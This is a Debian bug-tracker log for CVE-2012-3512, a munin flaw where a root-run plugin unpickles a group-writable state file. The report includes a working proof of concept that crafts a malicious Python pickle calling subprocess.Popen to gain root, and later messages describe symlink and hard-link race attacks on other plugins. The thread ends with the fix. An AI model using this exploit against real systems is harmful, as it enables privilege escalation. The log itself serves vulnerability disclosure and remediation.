munin: CVE-2012-3512: insecure state file handling, munin->root

Debian Bug report logs - #684075
munin: CVE-2012-3512: insecure state file handling, munin->root

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Stevie Trujillo <stevie.trujillo@gmail.com>

To: submit@bugs.debian.org

Subject: Subject: munin: insecure state file handling, munin->root privilege escalation in smart_ plugin

Date: Mon, 6 Aug 2012 20:22:32 +0200

Package: munin-plugins-core
Version: 1.4.5-3
Severity: grave
Tags: upstream security
X-Debbugs-CC: helmut@subdivi.de

Hello, copying kenyon's report from
http://www.munin-monitoring.org/ticket/1234 :



Currently, plugins which run as root mix their state files in the same
directory as non-root plugins. The state directory is owned by
munin:munin and is group-writable. Because of these facts, it is
possible for an attacker who operates as user munin to cause a
root-run plugin to run arbitrary code as root.

A proof-of-concept example is the smart_ plugin. It must run as root
to access disk SMART data. It also stores state in Python pickle
format, which can store executable Python code. Example follows:



# su -s /bin/sh -c /bin/sh munin
$ cd /var/lib/munin/plugin-state
$ mv smart-sda.state smart-sda.state.orig
$ cat bla.py
import pickle
import subprocess
import sys

class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh', '-c', 'id > /tmp/whoami'),))

pickle.dump(RunBinSh(), sys.stdout)
$ python bla.py > smart-sda.state
# wait for node to run smart_ plugin
$ cat /tmp/whoami
uid=0(root) gid=110(munin) groups=0(root),110(munin)



A possible solution is to have a directory dedicated to each plugin,
especially plugins which may run with superuser privileges, so that
less-privileged users cannot modify their state files. This cannot be
enforced by munin on all plugins, but this can be enforced by munin
developers for plugins shipped with the munin package. We should
consider making it easy for plugin writers to do this, maybe by making
the perl/bourne shell/other language munin plugin API use a dedicated
plugin state directory for each plugin. Otherwise, a plugin could be
hardcoded to create and use a subdirectory of the existing
plugin-state directory.

Thanks to "cnu" on the munin IRC channel for raising this issue and
providing the smart_ example.

Message #12 received at 684075@bugs.debian.org (full text, mbox, reply):

From: Holger Levsen <holger@layer-acht.org>

To: Stevie Trujillo <stevie.trujillo@gmail.com>, 684075@bugs.debian.org

Subject: Re: [Packaging] Bug#684075: Subject: munin: insecure state file handling, munin->root privilege escalation in smart_ plugin

Date: Tue, 7 Aug 2012 23:19:04 +0200

Hi Stevie,

On Montag, 6. August 2012, Stevie Trujillo wrote:
> A possible solution is to have a directory dedicated to each plugin,
> especially plugins which may run with superuser privileges, so that
> less-privileged users cannot modify their state files. This cannot be
> enforced by munin on all plugins, but this can be enforced by munin
> developers for plugins shipped with the munin package. We should
> consider making it easy for plugin writers to do this[...]

thanks for the bug report, I sigh and agree.


cheers,
	Holger

Message #21 received at 684075@bugs.debian.org (full text, mbox, reply):

From: Helmut Grohne <helmut@subdivi.de>

To: Debian Bug Tracking System <684075@bugs.debian.org>

Subject: Re: munin: insecure state file handling, munin->root

Date: Thu, 9 Aug 2012 09:29:06 +0200

I investigated whether just fixing the smart_ plugin would be enough of
a workaround for stable. We only have a finite amount of plugins that
can instantiate this vulnerability. Just how many do? Basically we are
interested in those plugins that run with elevated privileges and use
state files. The first restriction reduces the number of plugins to the
following set (assuming default configuration of sid):

apt courier_mta_mailqueue courier_mta_mailstats courier_mta_mailvolume
cps_ exim_mailqueue exim_mailstats fw_conntrack fw_forwarded_local
hddtemp_smartctl hddtemp2 if_ if_err_ ip_ ipmi_ mysql_ mysql_bytes
mysql_innodb mysql_isam_space_ mysql_queries mysql_slowqueries
mysql_threads postfix_mailqueue postfix_mailstats postfix_mailvolume
smart_ vlan_ vlan_inetuse_ vlan_linkuse_ ejabberd_ dhcpd3
jmx_tomcat_dbpools samba postgres_autovacuum postgres_checkpoints
postgres_locks_ postgres_querylength_ postgres_streaming_ postgres_users
postgres_bgwriter postgres_connections_ postgres_oldest_prepared_xact_
postgres_scans_ postgres_transactions_ postgres_xlog postgres_cache_
postgres_connections_db postgres_prepared_xacts_ postgres_size_
postgres_tuples_ fail2ban

Big list. Now let's look at the second condition. Surely the plugin will
somehow have to reference /var/lib/munin/plugin-state. Since plugin.sh
does not give that reference and there is no other library for writing
plugins they will somehow have to mention "plugin-state" (seems like a
safe bet). Filtering those files which contain plugin-state gives us
this list:

apt courier_mta_mailstats courier_mta_mailvolume mysql_isam_space_
smart_

Observations:
 * It is way shorter.
 * It includes smart_ (the original vulnerability), so we didn't over
   prune this.
 * The list contains more than smart_. :-(

Now to the individual plugins.

 * apt: Well it does check whether its statefile is a symbolic link and
   only if it is not opens a statefile. This is a TOCTOU race condition.
   => Overwriting arbitrary files as root with non-chosen content.
   Another possibility could be to hard link a root owned file you wish
   to truncate. (But that only works on the same device.)
 * courier_mta_mailstats and courier_mta_mailvolume are similar.
 * mysql_isam_space_ does a more tricky check, but gives the same
   result.
 * smart_ gives you root when reading those files.

So my conclusion is that smart_ is the worst offender as there is a
ready to use exploit floating around now. Exploiting the other issues
requires more work and possibly additional issues in unrelated software.
Nevertheless just fixing smart_ is not a satisfactory solution, as it
leaves known issues behind.

Helmut

Message #26 received at 684075@bugs.debian.org (full text, mbox, reply):

From: Kenyon Ralph <kenyon@kenyonralph.com>

To: Helmut Grohne <helmut@subdivi.de>, 684075@bugs.debian.org

Subject: Re: Bug#684075: munin: insecure state file handling, munin->root

Date: Thu, 9 Aug 2012 03:18:46 -0500

[Message part 1 (text/plain, inline)]

On 2012-08-09T09:29:06+0200, Helmut Grohne <helmut@subdivi.de> wrote:
> Big list. Now let's look at the second condition. Surely the plugin will
> somehow have to reference /var/lib/munin/plugin-state. Since plugin.sh
> does not give that reference and there is no other library for writing
> plugins they will somehow have to mention "plugin-state" (seems like a
> safe bet). Filtering those files which contain plugin-state gives us
> this list:

There is another library for writing plugins, which provides some
abstraction for state file handling: the Perl library
https://github.com/munin-monitoring/munin/blob/devel/plugins/lib/Munin/Plugin.pm

-- 
Kenyon Ralph

[signature.asc (application/pgp-signature, inline)]

Message #33 received at 684075@bugs.debian.org (full text, mbox, reply):

From: Kurt Seifried <kseifried@redhat.com>

To: 684075@bugs.debian.org

Subject: CVE-2012-3512 munin: insecure state file handling, munin->root privilege

Date: Mon, 20 Aug 2012 22:55:50 -0600

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE-2012-3512 munin: insecure state file handling, munin->root privilege

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJQMxTWAAoJEBYNRVNeJnmTFwkP/3QyJJ7K+n4IT7IsrCyosVdp
vP3mGM6ZngV5G6xKUx+s9hs096N7uDErs0gMuHbgF/lFtz1X6o9VyKJ4pFL+tk3s
kD1DM+2pvv+iF/MpqHlka1Qvaj68tupr0n3d6VtGJ3+B7GuZf4eNtWSj8aDYdM+Z
1UCPggBlX1i+3D6W2sOBt91EkL15vqbxgfw7m0G5YfCL4mMlFiadxfJgKpOAEbrO
Z7LoXVdDl01oqioUICOPNGWgBfaNKmal6LOdF//B1ItOQHDaNNJtmgbCpR/TXz/5
k522qWxcgw09VjEGa98WogWQNEGGthMniaK6EZGC6QEBygfVmAJaUhOZ9y0dRM9l
tlJNDA+iNBY/3RrTFSfKOqcjHknEgq/E+eaOTQYA89HfJUp8JuxPDKPV9rEKV9iu
pwaKWVOJjKQWtf2fPjWv90lTJnYoxro3+f0vx/oLWOMwkvF3UFF9bPMNlVUzlHEO
DxEkGhFK4qRkVhDrqbtKvxtiKFaqRXsrHKg0OqaqsOfs8XDzAhlytLPpePLG43J3
BuXZOYDyUiImFi8aw4CQCXh7Vr3TzVmT4Agwso16zi7n4wNX2j+SWQ37MMvxid2H
jWltfykz9UX9Q+/VR0HwM5OOcoTaPbm5RSuRaQ3yUv96wngR77N15kFWHH1tzpBq
Yb3D76TIk3ZZzxsxtGUX
=PVk0
-----END PGP SIGNATURE-----

Message #38 received at 684075-close@bugs.debian.org (full text, mbox, reply):

From: Holger Levsen <holger@debian.org>

To: 684075-close@bugs.debian.org

Subject: Bug#684075: fixed in munin 2.0.6~git-1

Date: Thu, 30 Aug 2012 08:48:19 +0000

Source: munin
Source-Version: 2.0.6~git-1

We believe that the bug you reported is fixed in the latest version of
munin, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 684075@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Holger Levsen <holger@debian.org> (supplier of updated munin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Thu, 30 Aug 2012 08:26:09 +0000
Source: munin
Binary: munin-node munin-plugins-core munin-plugins-extra munin-plugins-java munin munin-common munin-async munin-doc
Architecture: source all
Version: 2.0.6~git-1
Distribution: experimental
Urgency: low
Maintainer: Munin Debian Maintainers <packaging@munin-monitoring.org>
Changed-By: Holger Levsen <holger@debian.org>
Description: 
 munin      - network-wide graphing framework (grapher/gatherer)
 munin-async - network-wide graphing framework (async master/client)
 munin-common - network-wide graphing framework (common)
 munin-doc  - network-wide graphing framework (documentation)
 munin-node - network-wide graphing framework (node)
 munin-plugins-core - network-wide graphing framework (plugins for node)
 munin-plugins-extra - network-wide graphing framework (user contributed plugins for nod
 munin-plugins-java - network-wide graphing framework (java plugins for node)
Closes: 679897 684075 684076 685343 686089 686090 686093
Changes: 
 munin (2.0.6~git-1) experimental; urgency=low
 .
   * 2.0.6 is actually unreleased still, this is based on the current git
     commit 6183662. The following fixes are included:
     - munin-node: more secure state file handling, introducing a new plugin
       state directory root, owned by uid 0. Then each plugin runs in its own
       UID plugin state directory, owned by the said UID. (Closes: #684075),
       (Closes: #679897), closes CVE-2012-3512.
     - munin-cgi-graph: ignore @ARGV to fix CVE-2012-3513 (Closes: #684076),
       thanks to Helmut Grohne <helmut@subdivi.de>
     - munin-cron: call munin-graph with --cron argument (Closes: #685343)
     - Master/Node.pm: fix _node_read_fast() to accept all valid returns
       (Closes: #686089) and _do_connect() to not use an uninitialized
       variable. (Closes: #686090)
     - munin-async: make spoolread less restrictive about (valid) plugin names
       (Closes: #686093)
   * Update Location and Scriptalias in shipped apache.conf to reflect changes
     introduced upstream in 64dfec73 coming in 2.0.6. This fixes a regression
     introduced in fixing #682869.
Checksums-Sha1: 
 87f92bd652589be479511fd928f17ca9e62172ef 2129 munin_2.0.6~git-1.dsc
 e28fb8500f1363a905f2be164c3f0ec4780aca5c 1422644 munin_2.0.6~git-1.tar.gz
 495b3c699c5db9706db03d9d2eeab149a3d8c113 126252 munin-node_2.0.6~git-1_all.deb
 76a3d3fcd400f5221ba5d7424c30e0b5339b9b43 302894 munin-plugins-core_2.0.6~git-1_all.deb
 dc01c511e671c0a677dfc6cf7fec360077934e6f 152910 munin-plugins-extra_2.0.6~git-1_all.deb
 71b1c478d9a7abd4d901d954ab52f6d84479559a 145808 munin-plugins-java_2.0.6~git-1_all.deb
 6d24d5033c9387d8e8f3910373646b74c74cbf13 200446 munin_2.0.6~git-1_all.deb
 5954e9803442dbd4fe7f24adbd0b1bc9fc6a7c1b 93692 munin-common_2.0.6~git-1_all.deb
 acf0ac69dd6e51a091bb55699f1ba7ccd32e5efb 81604 munin-async_2.0.6~git-1_all.deb
 1fe472bce2797dd2929955e7101a70f0e5283e2a 210798 munin-doc_2.0.6~git-1_all.deb
Checksums-Sha256: 
 e788a52a42e577702b03df2a76b902ecfb75d7d554bab56ab218a96857ceb1d4 2129 munin_2.0.6~git-1.dsc
 2fba10446f70b872d7fd0c2aef3e6d7fd6d19363a98228d8079d16be1c431943 1422644 munin_2.0.6~git-1.tar.gz
 c5e3df113333b5fb286c943ef1e252f9caa981c83c5ac47d24a77e6fdb3cb058 126252 munin-node_2.0.6~git-1_all.deb
 8adfd149197072b108d26ea402393cc40b203c652bee10b3e67c56da9a75744e 302894 munin-plugins-core_2.0.6~git-1_all.deb
 343093da2cdca0dfe21d32c8ea2b4f14e9c1b6e202fea45b10f68bea4f85690f 152910 munin-plugins-extra_2.0.6~git-1_all.deb
 50d926265834e95a642617a575d8fc29c6bec0ca4e97b914da26135526cd3ee0 145808 munin-plugins-java_2.0.6~git-1_all.deb
 7b8fa95370adb1eaff00091d99a3543ab6b62850f7d09e873b8a375c4fc81d52 200446 munin_2.0.6~git-1_all.deb
 e8e501fc937dbd964b2e8092385e15b4edf99dd26307e28e79b245c092d714f6 93692 munin-common_2.0.6~git-1_all.deb
 3fb62447d4df6d00b89de1be7acac538bcd1dafddcef92217e97aacfa9dbe094 81604 munin-async_2.0.6~git-1_all.deb
 f7d126effa2b2924a5964fa09b427d3dad62195c2e15c3a7254ccb767e91ad33 210798 munin-doc_2.0.6~git-1_all.deb
Files: 
 cb7b1f41569d38be6104d578543c637a 2129 net optional munin_2.0.6~git-1.dsc
 61aa2c32d0a415d7e14d424cf771bbb1 1422644 net optional munin_2.0.6~git-1.tar.gz
 55c3fa84967745332b796b21249fa85a 126252 net optional munin-node_2.0.6~git-1_all.deb
 3b271a0f6b4746bbe1e0fc5eea4ca72f 302894 net optional munin-plugins-core_2.0.6~git-1_all.deb
 d39bfbb398a5c30e1ce985ca87e703d3 152910 net optional munin-plugins-extra_2.0.6~git-1_all.deb
 26fe11792149f134c3cf34988c528006 145808 net optional munin-plugins-java_2.0.6~git-1_all.deb
 349a40dc4c3bbdcd0640fca8e2936ac9 200446 net optional munin_2.0.6~git-1_all.deb
 a86b0f6d30e1a94610fca9ef491e49fe 93692 net optional munin-common_2.0.6~git-1_all.deb
 c0a03eb040ff1a0e098b9287f0ea4230 81604 net optional munin-async_2.0.6~git-1_all.deb
 3076757e3fe6a060197ee96b55473490 210798 doc optional munin-doc_2.0.6~git-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQIVAwUBUD8lvgkauFYGmqocAQgfxQ//egaDsjnxdDGxqTJ7gp552WnGGP9Ws9Lr
Bnirdgknb+zeIpVkLBe1bSgiFToKIAl/xaIMe9gzk8tiksSnpr634f79t5mmoqLb
P8ljp5H3fp+fNDjtrbGVv2QzUXn/B+NE8edgqR20LU7XXwoGvG/JVK4nFvElNCmh
NZBy/2Xge1W7PbT3mCqZj1mYMhJhXt/yUjA7vFrJyGfwM36Xry4MRqhYj+wFEeXN
iiT3dxJ77hupp7Lch4Iq2UylGU6mb9GgOSnXEqfQBhnaFDH/79Yfv6Yd1JBGgHlc
JgkrrzhoxwtI07W0QVyK4epUkl6SCQfVBQXnXd8lhyLZH4xOctQbiTYHg7Xb4ea2
Fik+37ePyB2epOxTrFNPEv2PcyinnutCNY3DITZk+eqBlS8/e9cYfigLmUkwCo9J
FrePyPAofQj4+k3EtesLN4/Ss0GrOqEJ+UUOSsj1ini7fHDjZ6FPo5Pr2FG7oSQI
SJNVWiczYIC6AKH9XqfFznuTmEHcI5MZKjfUeRbbaXzuEgdJHlNpqQ6aiVcfVZOK
I8YW5P4hontOTRFCgkZK2F3GYj4OD8SlPCOM39zNwoeCBGsbdW8N3VuQ8x8xahN2
V19KUC7JUTLPNr5HglQOHQoA7boUjEi6y+dJ3S3al92JppMxvBPnZpsClVNNc1Y7
t68o1Uwiu0Q=
=XPYG
-----END PGP SIGNATURE-----

Message #43 received at 684075-close@bugs.debian.org (full text, mbox, reply):

From: Holger Levsen <holger@debian.org>

To: 684075-close@bugs.debian.org

Subject: Bug#684075: fixed in munin 2.0.6-1

Date: Mon, 03 Sep 2012 13:17:47 +0000

Source: munin
Source-Version: 2.0.6-1

We believe that the bug you reported is fixed in the latest version of
munin, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 684075@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Holger Levsen <holger@debian.org> (supplier of updated munin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Mon, 03 Sep 2012 12:42:09 +0000
Source: munin
Binary: munin-node munin-plugins-core munin-plugins-extra munin-plugins-java munin munin-common munin-async munin-doc
Architecture: source all
Version: 2.0.6-1
Distribution: unstable
Urgency: high
Maintainer: Munin Debian Maintainers <packaging@munin-monitoring.org>
Changed-By: Holger Levsen <holger@debian.org>
Description: 
 munin      - network-wide graphing framework (grapher/gatherer)
 munin-async - network-wide graphing framework (async master/client)
 munin-common - network-wide graphing framework (common)
 munin-doc  - network-wide graphing framework (documentation)
 munin-node - network-wide graphing framework (node)
 munin-plugins-core - network-wide graphing framework (plugins for node)
 munin-plugins-extra - network-wide graphing framework (user contributed plugins for nod
 munin-plugins-java - network-wide graphing framework (java plugins for node)
Closes: 679897 684075 684076 685343 686089 686090 686093
Changes: 
 munin (2.0.6-1) unstable; urgency=high
 .
   * New upstream release 2.0.6, switching back to cron graphing (as it better
     for small setups) and besides that only containing bugfixes, but many of
     them. See the upstream ChangeLog for the full list.
     - munin-node: more secure state file handling, introducing a new plugin
       state directory root, owned by uid 0. Then each plugin runs in its own
       UID plugin state directory, owned by the said UID. (Closes: #684075),
       (Closes: #679897), closes CVE-2012-3512.
       So all properly written plugins will use
       /var/lib/munin-node/plugin-state/$uid/$some_file now - please report
       plugins that are still using /var/lib/munin/plugin-state/ - as those
       might pose a security risk!
     - munin-cgi-graph: ignore @ARGV to fix CVE-2012-3513 (Closes: #684076),
       thanks to Helmut Grohne <helmut@subdivi.de>
     - munin-cron: call munin-graph with --cron argument (Closes: #685343)
     - Master/Node.pm: fix _node_read_fast() to accept all valid returns
       (Closes: #686089) and _do_connect() to not use an uninitialized
       variable. (Closes: #686090)
     - munin-async: make spoolread less restrictive about (valid) plugin names
       (Closes: #686093)
   * Update Location and Scriptalias in shipped apache.conf to fix a regression
     introduced in fixing #682869.
   * munin-node.postinst: don't create /var/lib/munin/plugin-state anymore as
     munin-node now uses /var/lib/munin-nodes/plugin-state and subdirs and
     handles creation by itself.
   * debian/rules: workaround bug in upstream Makefile targets to move
     /var/lib/async from munin-node package to munin-async.
   * debian/control:
     - make munin-async depend on munin-node for now.
     - update Vcs: headers to point to an uptodate repository.
   * Remove build/resources/apache-cgi.conf from munin.docs as it's outdated.
   * update munin.NEWS to reflect that everybody using cgi graphing needs to
     update the configuration files and that cron graphing is the default
     again. (cgi graphing was the default from pre-2.0 until 2.0.5)
Checksums-Sha1: 
 f74026d9184cce248e5161f2988658d05ce49e9c 2362 munin_2.0.6-1.dsc
 639bd5b9fe457326842ed425f5258ea29db0b853 1325754 munin_2.0.6.orig.tar.gz
 7e27351c09fbbd9d5e965a533c10764939cf3917 51051 munin_2.0.6-1.diff.gz
 7fd31a561466dca631337321d05845af0f75714a 127752 munin-node_2.0.6-1_all.deb
 53cb5953732a2346c295cdceca97e5edabda19ae 304194 munin-plugins-core_2.0.6-1_all.deb
 2e4d133a910fa252dab2391305437b3752cc37e8 154006 munin-plugins-extra_2.0.6-1_all.deb
 3eec5502fcf9e64b84c9edf98613221ff694fcd8 146912 munin-plugins-java_2.0.6-1_all.deb
 23d76f087fb00cc666455a72bdf015fad9f21c74 201718 munin_2.0.6-1_all.deb
 0a815552c09f7b182f3b124f6f8a465163ca5ed8 94732 munin-common_2.0.6-1_all.deb
 bffcde93d5c686fcf8de91581c734d32f8b09022 82804 munin-async_2.0.6-1_all.deb
 3619315c94a405d54ac822262cb905bbf8b05f8c 211516 munin-doc_2.0.6-1_all.deb
Checksums-Sha256: 
 3470e54e99e0a16e607c7f6f3812756a643008e2de91b9e2f1b695d06eab944a 2362 munin_2.0.6-1.dsc
 ff99a3c36156adb6b867bb684ec508a857728336c0b81a93955bbcc9d5045ea6 1325754 munin_2.0.6.orig.tar.gz
 559090dec1df4d5c4d8592f630a8e827f0eacc54756aaf060ef11af4cc2c1d06 51051 munin_2.0.6-1.diff.gz
 fdaafe38f6e05e966063f933696e1ebf87c75caec8efeddde71630584906fca4 127752 munin-node_2.0.6-1_all.deb
 7f780cdd706b61119758281031ac16d6e9a17fc153673be8b6d47857d2067605 304194 munin-plugins-core_2.0.6-1_all.deb
 a45aee6a32389731dcfa45cccd1926560518b02419b3c40fd9d989736fa86b5f 154006 munin-plugins-extra_2.0.6-1_all.deb
 b39a4c341fd99c9be476dee153e9a9110e8a4aa8ae178da5bf657ca33f9415da 146912 munin-plugins-java_2.0.6-1_all.deb
 ba5fe591b6a98fad66cc24ba99eba58c2b71377a2c04fbad3be7e5fd5433a583 201718 munin_2.0.6-1_all.deb
 fa755d6f651834adf9e91d62b960662f832b08fd44e2a1d305af694408398859 94732 munin-common_2.0.6-1_all.deb
 2cb41fd22e9800e0667b2c1af516ae6e96e885cfdf28a6c3ef90cfea5c7edf3e 82804 munin-async_2.0.6-1_all.deb
 c7006f900b4bacff7ade589600b3ade71c4cbb4c9ed2774fe1f9189d94cf7465 211516 munin-doc_2.0.6-1_all.deb
Files: 
 1e9514ba9330de5e78d22c474b06d0af 2362 net optional munin_2.0.6-1.dsc
 a64e7d3d7a7736f3959092145886ce88 1325754 net optional munin_2.0.6.orig.tar.gz
 32e91dc8f2aae9ca27f4924ca1013755 51051 net optional munin_2.0.6-1.diff.gz
 2bff976ceb3624407b8d8b2250a44873 127752 net optional munin-node_2.0.6-1_all.deb
 ed4d325236237233008ffd4e32e80a45 304194 net optional munin-plugins-core_2.0.6-1_all.deb
 7d7a088725e012d8a2e89bb654e6fea8 154006 net optional munin-plugins-extra_2.0.6-1_all.deb
 2c2d8496a8ecc114dfd5b6b6926c2a28 146912 net optional munin-plugins-java_2.0.6-1_all.deb
 334c9918acd98ad610f2f6b9ff3d1072 201718 net optional munin_2.0.6-1_all.deb
 81bfc537f8fd914a1f7cc84e1673ea50 94732 net optional munin-common_2.0.6-1_all.deb
 301cd30114b0202d5af147cfc9e37148 82804 net optional munin-async_2.0.6-1_all.deb
 22b455e1b14aa3d50cb9181fd0b1d9af 211516 doc optional munin-doc_2.0.6-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQIVAwUBUESqGwkauFYGmqocAQgkpQ//XIlizdF6mCQwt+a4Yv6EKSU4GZmw3Wj8
vZgXYp2Zo5r4lnsd9huSgBoUudzX+1b6NiyhKZh4cMUEIXRqD6ObbVWgFKzrXrTj
7zKh/MeFDYnhx71JPbHh+SsWfXC8aNTpU6zkE9GPgWOZP5RBYjpcyf7qQJMApclg
MRUzUEaX4fcXEZMEkZI+KjuZQQej55Zwq+iRfCHYyMoslVO6eyEmiFPw33pKIf2R
8u4xseoUxmUinvD1GIEn2OfSoZiOzionEnFLXm9XSuDdDv5D3EYTF2y7XYQZu7l2
Wd48aU0KJRpNtNV2XiW/7EAXu+dE5zl5+364Qb+tYcQaaerYvF0RJWXqOLxC49w0
OZaTB9MJ4om9bCAh5jLxrejSLjVMqvCc5ntaRudqgY+dWJoDuzTs0HlwFlavq6D0
vxYw2Wvo52SxVrpWXpROHNOo0ivb1y6t4yqOC7SYpOOnLRXQ4ipK0AkSdx1z23FD
FH/l8vrqOHNj78n6xiLqXm8jlufKYD8KpP9O3UkttQQ6cS2k10jFHN5PskiH32NR
CH3L9S16x4nODYPO/L15Rutn/ihdeKm8nQcqTPMTKRi/3wEfi4UYDvpRM7bofs3h
5w70JYhQiRH18Jw0bhXmbK0qYo8m5S1OafYQbjO63/RcFcwBs2tzpu46ulnFczOW
0YDtt+72KHo=
=PJjc
-----END PGP SIGNATURE-----

Send a report that this bug log contains spam.